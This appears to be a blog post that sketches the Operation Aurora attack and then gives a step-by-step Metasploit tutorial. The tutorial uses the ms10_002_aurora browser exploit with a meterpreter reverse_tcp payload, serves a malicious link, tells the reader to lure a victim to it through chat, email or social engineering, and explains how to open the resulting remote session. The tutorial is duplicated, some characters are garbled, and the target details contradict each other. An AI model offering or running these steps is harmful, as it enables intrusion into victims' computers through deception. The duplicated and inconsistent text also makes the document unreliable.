Operation Aurora was a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China. The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack.
The attack has been aimed at dozens of other organizations, of whichAdobe Systems, Juniper NetworksandRackspacehave publicly confirmed that they were targeted. According to media reports,Yahoo,Symantec, Northrop Grumman, MorganStanley and DowChemicalwere also among the targets.
Exploit Targets
Web Browser: Internet Explorer 5, Internet Explorer 6, Internet Explorer 7, Internet Explorer 8
Operating System: Windows vista, windows 7, windows server 2008
Attacker:metasploit
Victim PC: Windows XP
Open terminal type
msfconsole
use exploit/windows/browser/ms10_002_aurora
Msf exploit(ms10_002_aurora)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms10_002_aurora)>set lhost 192.168.1.4(IP of Local Host)
Msf exploit (ms10_002_aurora)>set srvhost 192.168.1.4(This must be an address on the local machine)
Msf exploit (ms10_002_aurora)>set uripathmeeting(The Url to use for this exploit)
Msf exploit (ms10_002_aurora)>exploit
Now an URL you should give to your victim http://192.168.1.4/meeting
Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use �sessions -l� and the Session number to connect to the session. And Now Type �sessions -i ID�
The attack has been aimed at dozens of other organizations, of whichAdobe Systems, Juniper NetworksandRackspacehave publicly confirmed that they were targeted. According to media reports,Yahoo,Symantec, Northrop Grumman, MorganStanley and DowChemicalwere also among the targets.
Exploit Targets
Web Browser: Internet Explorer 5, Internet Explorer 6, Internet Explorer 7, Internet Explorer 8
Operating System: Windows vista, windows 7, windows server 2008
Requirement
Attacker:metasploit
Victim PC: Windows XP
Open terminal type
msfconsole
use exploit/windows/browser/ms10_002_aurora
Msf exploit(ms10_002_aurora)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms10_002_aurora)>set lhost 192.168.1.4(IP of Local Host)
Msf exploit (ms10_002_aurora)>set srvhost 192.168.1.4(This must be an address on the local machine)
Msf exploit (ms10_002_aurora)>set uripathmeeting(The Url to use for this exploit)
Msf exploit (ms10_002_aurora)>exploit
Now an URL you should give to your victim http://192.168.1.4/meeting
Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use �sessions -l� and the Session number to connect to the session. And Now Type �sessions -i ID�
0 nhận xét:
Đăng nhận xét